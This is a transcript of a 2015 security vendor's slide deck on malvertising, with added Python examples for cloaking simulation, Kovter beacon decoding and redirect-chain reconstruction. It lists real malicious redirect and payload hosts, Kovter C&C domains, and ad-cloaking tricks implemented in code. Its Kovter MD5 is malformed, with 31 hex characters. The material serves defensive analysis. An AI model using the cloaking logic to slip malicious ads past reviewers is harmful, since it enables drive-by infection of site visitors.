Malware's Most Wanted: Malvertising attacks on HuffingtonPost, Yahoo, AOL


Upload: cyphort

Post on 03-Aug-2015


Malvertising

@belogor

Your speakers today

Nick Bilogorskiy (@belogor), Director of Security Research

Anthony James, VP of Marketing and Products

Agenda

o Malvertising explained
o Exploit Kits
o Case Studies
o Stats and Trends
o Wrap-up and Q&A

Cyphort Labs T-shirt

Threat Monitoring & Research team

o 24x7 monitoring for malware events
o Assist customers with their forensics and incident response

We enhance malware detection accuracy

o False positives/negatives
o Deep-dive research

We work with the security ecosystem

o Contribute to and learn from the malware KB
o Best of 3rd-party threat data

What is Malvertising

Malvertising is the use of online advertising to spread malware.

Malvertising involves injecting malicious ads into legitimate online advertising networks and web pages.

Source: Anti-Malvertising.com

How Malvertising works

1. Attacker creates and injects malware ads into an advertising network
2. Advertising network selects an ad based on an auction and sends it to the website
3. Website serves a banner ad, sometimes a malicious one
4. User visits the popular website and gets infected via an exploit kit

Malvertising in the News

Cyphort.com/blog

Malvertising history timeline (2007–2014)

o Malvertising technique was first identified in Flash files
o New York Times “Vonage” banner hijacked, installed FakeAV
o Speedtest.net ad network OpenX serves malware ad
o Malvertising uses dynamic domain names
o HuffPo, LA Weekly malvertising ads reach 1.5 billion users

Poll Question #1

o How many ad impressions were driven by malvertising in 2013?
o Over 10 million
o Over 1 billion
o Over 10 billion

Rise of Malvertising

OTA stats

• Malvertising increased 200%+ in 2013 to over 209,000 incidents, generating 12.4B+ malicious ad impressions.

Google stats

• Google filtered 524 million 'bad' ads in 2014, and disabled 214,000 malware websites.

Cyphort stats

• Cyphort's own data shows 300% malvertising growth in 2014

[Chart: Cyphort malvertising detections by month, Jun-14 to Feb-15]

Online Advertising Complexity

o 5.3 trillion online ads served, $100+ billion spent

Online Advertising Complexity

Diagram (Karina Sanz): the parties sitting between the Audience and the Advertisers

o Publishers
o Publisher Tools
o Yield Optimization
o Ad Ops / Ad Servers
o Ad Exchanges / SSPs
o Ad Networks
o Media Buying Platforms / DSPs
o Agencies
o Creative Optimization
o Data Optimization
o Sharing Data / Social Tools
o Data Suppliers
o DMPs and Data Aggregators
o Verification / Attribution / Analytics

The combination of technology and services that connect Advertisers with Publishers can be a complex process with many parties involved.

Almost every one of them is vulnerable to malware injection.

Online Advertising Complexity

o TDBank has 11 calls to third-party servers
o ESPN has 83 calls to third-party servers
o TMZ.com has 352 calls …

Online Advertising Complexity: RTB

Techniques to avoid detection

o Enable the malicious payload only after a delay, so the creative is clean when the ad network reviews it

o Only serve exploits to every 10th user, so a repeat visit usually sees a clean ad

o Verify user agents and IP addresses, serving the exploit only to targeted browsers and never to known scanner addresses

o HTTPS redirectors, which hide the redirection chain from network inspection
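To make the point concrete, here is an added example (not code from the Cyphort deck): a small simulation of an ad server that applies the evasion rules above, fed first to a one-shot review-time scan and then to repeated scans that rotate the User-Agent and the source IP. The creatives, the host names, the scanner IP range and the thresholds are all invented for the simulation.

```python
"""Why a one-shot review misses a cloaked ad creative.

Added example, not code from the Cyphort deck. It simulates an ad server
that applies the evasion tricks listed above (stay clean for a while after
upload, serve the exploit only to every 10th visitor, only to an Internet
Explorer-looking User-Agent, and never to known scanner IPs), then
contrasts a single review-time scan with repeated, varied scans.
All names, IP ranges and thresholds are invented for the simulation.
"""
import ipaddress
from dataclasses import dataclass

CLEAN_CREATIVE = "<img src='https://cdn.example-ads.test/banner.png'>"
# Stand-in for a redirector to an exploit kit landing page (hypothetical host).
MALICIOUS_CREATIVE = "<iframe src='https://redir.example-bad.test/gate' width=1 height=1>"

# Hypothetical: address ranges the malvertiser believes belong to ad-review scanners.
SCANNER_RANGES = [ipaddress.ip_network("203.0.113.0/24")]


@dataclass
class CloakingAdServer:
    every_nth: int = 10         # "only serve exploits to every 10th user"
    quiet_period_s: int = 3600  # "enable malicious payload after a delay"
    visits: int = 0

    def serve(self, user_agent: str, client_ip: str, elapsed_s: int) -> str:
        """Return the creative this visitor gets, applying every cloaking rule."""
        self.visits += 1
        if elapsed_s < self.quiet_period_s:
            return CLEAN_CREATIVE           # still inside the post-upload quiet period
        if "MSIE" not in user_agent and "Trident" not in user_agent:
            return CLEAN_CREATIVE           # not a browser the kit targets
        if any(ipaddress.ip_address(client_ip) in net for net in SCANNER_RANGES):
            return CLEAN_CREATIVE           # looks like a scanner, stay clean
        if self.visits % self.every_nth != 0:
            return CLEAN_CREATIVE           # most real users get the clean ad too
        return MALICIOUS_CREATIVE


def is_suspicious(creative: str) -> bool:
    """Toy check: a hidden 1x1 iframe to a third-party host is flagged."""
    return "<iframe" in creative and "width=1" in creative


def single_scan(server: CloakingAdServer) -> bool:
    """The ad network's review tool fetches the creative once, right after upload."""
    return is_suspicious(server.serve("AdReviewBot/1.0", "203.0.113.10", elapsed_s=0))


def continuous_scan(server: CloakingAdServer, rounds: int = 40) -> list:
    """Re-fetch the creative over time, rotating User-Agent and source IP.

    Returns (round, user_agent, ip) for every fetch that came back suspicious.
    """
    user_agents = [
        "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)",
        "Mozilla/5.0 (X11; Linux x86_64) Chrome/40.0",
    ]
    # Two residential-looking addresses plus one inside the "scanner" range.
    source_ips = ["198.51.100.7", "192.0.2.44", "203.0.113.10"]
    hits = []
    for i in range(rounds):
        ua = user_agents[i % len(user_agents)]
        ip = source_ips[i % len(source_ips)]
        creative = server.serve(ua, ip, elapsed_s=7200 + 600 * i)  # well past the quiet period
        if is_suspicious(creative):
            hits.append((i, ua, ip))
    return hits


if __name__ == "__main__":
    print("single review-time scan flagged:", single_scan(CloakingAdServer()))
    for hit in continuous_scan(CloakingAdServer()):
        print("caught on round %d via %s from %s" % hit)
```

The one-shot scan always reports clean: it runs inside the quiet period, from a scanner address, with a non-browser User-Agent, so every rule fires. The repeated scan only catches the creative on the rounds where the counter, the User-Agent and the source IP all line up, which is exactly why the deck's conclusion is to scan early, scan often and vary the vantage point.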

What is an Exploit Kit

o An exploit kit is a delivery mechanism for a variety of different types of malware

o The first exploit kit was WebAttacker, developed in 2006 and sold for $20 (source: secpod.org)

o Exploit kits infect you without a “click”

o Examples: Angler, Sweet Orange, Nuclear, RIG (source: Fox-it.com)

Exploit Kits popularity (TrendMicro 2014 stats)

Malvertising Case Studies

© Copyright 2014 Cyphort, Inc. All rights reserved. Proprietary & Confidential

Clean.navy malvertising (Feb 25, 2015)

A Clean.navy subdomain is loading the Angler Exploit Kit with an exploit for CVE-2014-6332 (Windows OLE Automation Array Remote Code Execution Vulnerability).

www.cyphort.com/dod-contractors-website-clean-navy-serving-drive-exploits/

1 start www.***zone.info
2 redirect ads.adgoto.com
3 redirect shop.traditionalarrows.com
4 malware payload bolivi**e.clean.navy/lists/9***


AFFITURE malvertising (Jan 22, 2015)

20+ websites were delivering malvertising via affiliate.affyield.com using the Angler exploit kit and the zero-day Flash CVE-2015-0311 exploit.

www.cyphort.com/affyield-com-serving-zero-day-flash/

1 start <infectedsite.biz>
2 redirect www.affyieldmb.com
3 redirect murzilka.eu
4 malware payload xxxxazot54moosa.in/xxx

GOPEGO malvertising (Feb 4, 2015)

gopego.com malvertising downloads CryptoWall ransomware. The attack serves an exploit package embedded in a Flash file, including exploits which target four vulnerabilities, among them the notorious CVE-2015-0311.

www.cyphort.com/gopego-malvertising-cryptowall/

Huffington Post / AOL malvertising (Jan 5, 2015)

HuffPo, LA Weekly, WeatherBug and other sites reaching 1.5 billion users were serving malvertising via advertising.com and installing Kovter malware.

www.cyphort.com/huffingtonpost-serving-malware/

1 start www.huffingtonpost.com
2 redirect advertising.com
3 redirect foxbusiness.com
4 malware payload Kuppicu.opoczno.pl:8080/books

HuffingtonPost malware – Kovter analysis

o Kovter is an ad-fraud Trojan (MD5 sum: A2A6A36C94D4FF5B42C346F3A3A49E7)

o Communication to the C&C is RC4 encrypted and BASE64 encoded

o If it detects any indication of analysis tools, virtualization or debugging tools, it POSTs data to a16-kite.pw and then exits

o Otherwise it POSTs data to a16-car.biz and then waits for commands

o The C&C server can issue the following commands:
  o RUN – execute a file
  o UPDATE – update itself
  o RESTART
  o FEED – ad fraud
  o SLEEP
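The "RC4 encrypted and BASE64 encoded" line is the part an analyst has to undo to read the beacons. The following is an added example, not code from the Cyphort deck or from the malware: it implements that wrapping in both directions and adds a simple key-selection check, so a captured POST body can be unwrapped once a candidate key has been pulled from the unpacked sample. The key, the field names and the sample beacon are constructed here and are not Kovter's real values.

```python
"""Decoding a Kovter-style C&C beacon (RC4 then base64).

Added example, not code from the Cyphort deck or from the malware. The slide
says Kovter's C&C traffic is RC4 encrypted and base64 encoded; this block
implements that scheme both ways so an analyst can unwrap a captured POST
body once the key is known, and shows a cheap way to pick the right key from
a list of candidates. The key, the field names and the sample beacon are
constructed here; none of them are Kovter's real values.
"""
import base64
import string
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def encode_beacon(fields: dict, key: bytes) -> str:
    """What the bot would POST: form-style fields -> RC4 -> base64 text."""
    body = "&".join("%s=%s" % kv for kv in fields.items()).encode()
    return base64.b64encode(rc4(key, body)).decode()


def decode_beacon(blob: str, key: bytes) -> bytes:
    """Analyst side: undo base64, then RC4 with the same key."""
    return rc4(key, base64.b64decode(blob))


_PRINTABLE = set(string.printable.encode())


def looks_like_beacon(plain: bytes) -> bool:
    """A correct key yields printable form data; a wrong key yields noise."""
    return (bool(plain) and all(b in _PRINTABLE for b in plain)
            and b"=" in plain and b"&" in plain)


def recover_key(blob: str, candidates: list) -> Optional[bytes]:
    """Try each candidate key (e.g. strings pulled from the unpacked sample)."""
    for key in candidates:
        if looks_like_beacon(decode_beacon(blob, key)):
            return key
    return None


# Constructed sample: a fake check-in, encoded with a made-up key.
SAMPLE_KEY = b"example-rc4-key"
SAMPLE_BEACON = encode_beacon(
    {"id": "1234ABCD", "os": "6.1", "av": "none", "vm": "0"}, SAMPLE_KEY
)

if __name__ == "__main__":
    print("wire form :", SAMPLE_BEACON)
    print("decoded   :", decode_beacon(SAMPLE_BEACON, SAMPLE_KEY))
    print("key found :", recover_key(SAMPLE_BEACON, [b"wrong", b"password", SAMPLE_KEY]))
```

Because RC4 has no integrity check, a wrong key does not fail loudly; it just produces bytes that do not look like form data, which is what `looks_like_beacon` exploits to pick the key. For a real sample, feed `recover_key` the string constants recovered from the unpacked binary.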

Crawler Trends and Stats

o 35% of the domains we found were infected more than once (repeated infections)
o AskMen.com - Jun 2014
o Indowebster - Sep 2014
o ThePirateBay.se - Oct 2014
o HuffingtonPost.com, LAWeekly, WeatherBug.com - Jan 2015

Poll Question #2

o On which day of the week is malvertising most active?
o Monday
o Wednesday
o Sunday
o All days equally

[Chart: malvertising attacks by day of the week, Monday to Sunday, counts 0–600]

Most attacks on weekends

Malvertising chain length

o Varies from 1 to 15 redirectors, 3.8 on average.

[Chart: number of malvertising chains by redirection chain length, 1 to 15, counts 0–350]

Longest malvertising chain example: ArticleField.com

1. www.articlefield.com (infected site)
2. w1ns.com
3. thfire.com
4. www.thfire.com
5. adsppperv.com
6. www.blog-hits.com
7. tracking1112.com
8. townsearchguides.com
9. tracki112.com
10. c.feed-xml.com
11. 109.206.188.72
12. 216.172.54.28
13. scriptforclick.com
14. dealsadvlist.com
15. spreadsheets.wiaawy.eu (payload)
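Chains like the one above, and the chain-length and TLD statistics in this section, come from stitching individual HTTP requests back together. The following is an added example, not code or data from the Cyphort deck: it takes proxy-style log records, walks Referer links backwards from each request to a known payload host, rebuilds the landing page, redirectors and payload chain per victim, and then reports redirector counts and the payload and infected-site TLD mix. The log lines are constructed; the host names are taken from the chains shown in this deck, but the paths, timestamps and client addresses are invented.

```python
"""Reconstructing malvertising redirection chains from a proxy log.

Added example, not code or data from the Cyphort deck. Given HTTP proxy
records (timestamp, client, method, URL, Referer, status), it walks Referer
links backwards from each request to a known payload host and rebuilds the
landing page -> redirectors -> payload chain, then reports the per-chain
redirector counts and the TLD mix that the slides summarize.
The log lines are constructed; the host names come from the chains shown
in this deck, but the paths, timestamps and clients are invented.
"""
import statistics
from collections import Counter
from urllib.parse import urlsplit

# Constructed log. Fields: ts client method url referer status ("-" = no Referer).
SAMPLE_LOG = """\
2015-01-05T10:00:01Z 10.0.0.5 GET http://www.huffingtonpost.com/ - 200
2015-01-05T10:00:02Z 10.0.0.5 GET http://advertising.com/r http://www.huffingtonpost.com/ 302
2015-01-05T10:00:02Z 10.0.0.5 GET http://foxbusiness.com/r http://advertising.com/r 302
2015-01-05T10:00:03Z 10.0.0.5 GET http://kuppicu.opoczno.pl:8080/books http://foxbusiness.com/r 200
2015-01-05T10:05:00Z 10.0.0.9 GET http://www.articlefield.com/ - 200
2015-01-05T10:05:01Z 10.0.0.9 GET http://w1ns.com/r http://www.articlefield.com/ 302
2015-01-05T10:05:01Z 10.0.0.9 GET http://thfire.com/r http://w1ns.com/r 302
2015-01-05T10:05:02Z 10.0.0.9 GET http://www.thfire.com/r http://thfire.com/r 302
2015-01-05T10:05:02Z 10.0.0.9 GET http://adsppperv.com/r http://www.thfire.com/r 302
2015-01-05T10:05:03Z 10.0.0.9 GET http://spreadsheets.wiaawy.eu/p http://adsppperv.com/r 200
"""

# Hosts an analyst has already identified as serving the exploit/payload.
PAYLOAD_HOSTS = {"kuppicu.opoczno.pl", "spreadsheets.wiaawy.eu"}


def parse_log(text: str) -> list:
    """One dict per record; a Referer of "-" becomes None."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, referer, status = line.split()
        records.append({"ts": ts, "client": client, "method": method, "url": url,
                        "referer": None if referer == "-" else referer,
                        "status": int(status)})
    return records


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def build_chains(records: list, payload_hosts: set) -> list:
    """For each request to a payload host, follow Referer links back to the landing page.

    The Referer map is keyed per client so two victims' chains never get spliced together.
    """
    parent = {(r["client"], r["url"]): r["referer"] for r in records if r["referer"]}
    chains = []
    for r in records:
        if host_of(r["url"]) not in payload_hosts:
            continue
        chain, seen = [r["url"]], {r["url"]}
        while (r["client"], chain[-1]) in parent:
            prev = parent[(r["client"], chain[-1])]
            if prev in seen:          # guard against Referer loops
                break
            chain.append(prev)
            seen.add(prev)
        chains.append(list(reversed(chain)))
    return chains


def hosts(chain: list) -> list:
    return [host_of(u) for u in chain]


def redirector_count(chain: list) -> int:
    """Hops strictly between the infected landing page and the payload host."""
    return max(len(chain) - 2, 0)


def tld(host: str) -> str:
    return host.rsplit(".", 1)[-1]


def summarize(chains: list) -> dict:
    lengths = [redirector_count(c) for c in chains]
    return {
        "chains": len(chains),
        "avg_redirectors": statistics.mean(lengths) if lengths else 0.0,
        "max_redirectors": max(lengths, default=0),
        "payload_tlds": Counter(tld(hosts(c)[-1]) for c in chains),
        "infected_tlds": Counter(tld(hosts(c)[0]) for c in chains),
    }


if __name__ == "__main__":
    found = build_chains(parse_log(SAMPLE_LOG), PAYLOAD_HOSTS)
    for c in found:
        print(" -> ".join(hosts(c)), "(%d redirectors)" % redirector_count(c))
    print(summarize(found))
```

Keying the Referer map per client matters: on a busy proxy, two victims can hit the same redirector seconds apart with different upstream ads, and a global map would splice one victim's landing page onto the other's payload. Referer can also be stripped or forged, so on real traffic the walk should be cross-checked against 302 Location headers and request timing.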

Infected TLDs

[Chart: infected domains by TLD (com, net, org, ru, ir, info, it, tv, de, fr), counts 0–2000]

Infected Hosting Country Origin

US 59%, Germany 8%, France 6%, UK 4%, Netherlands 4%, EU 3%, Spain 3%, China 2%, Canada 2%, Italy 2%, Hong Kong 2%, Korea 2%, Ukraine 1%, Thailand 1%, Austria 1%, Russia 1%

Payload TLDs

[Chart: payload domains by TLD (com, net, pl, org, biz, ua, us, in, vu, eu), counts 0–1200]

Payload Hosting Country Origin

US 72%, Turkey 11%, EU 5%, UK 3%, Russia 2%, Korea 2%, Germany 2%, France 1%, Canada 1%, Switzerland 1%

Conclusions

o Advertising networks get millions of submissions, and it is difficult to filter out every single malicious one.

o Attackers will use a variety of techniques to hide from detection by analysts and scanners.

o Advertising networks should use continuous monitoring: automated systems that repeatedly check for malware ads. Scan early and scan often, picking up changes in the advertising chains.

o Ad networks should have the latest security intelligence to power these monitoring systems.

o The risk increases on weekends and holidays.

Thank You!

Twitter: @belogor

Previous MMW slides on http://cyphort.com/labs/malwares-wanted/

References:

https://otalliance.org/system/files/files/resource/documents/report_-_online_advertising_hidden_hazards_to_consumer_security_date_privacy_may_15_20141.pdf
https://blog.opendns.com/2014/06/12/ads-security-dont-mix
http://www.cyphort.com/huffingtonpost-infected-again/
http://adwords.blogspot.com/2015/02/fighting-bad-advertising-practices-on.html
http://in.reuters.com/article/2014/10/16/cybersecurity-military-idINKCN0I52D820141016
http://www.slideshare.net/ksanz15/understanding-the-online-advertising-technology-landscape
http://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/
http://www.slideshare.net/mhmoo/us-digitalfutureinfocus2013-27520934
http://www.insideprivacy.com/files/2014/05/PSI-Report.pdf
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-evolution-of-exploit-kits.pdf
http://secpod.org/blog/?p=1207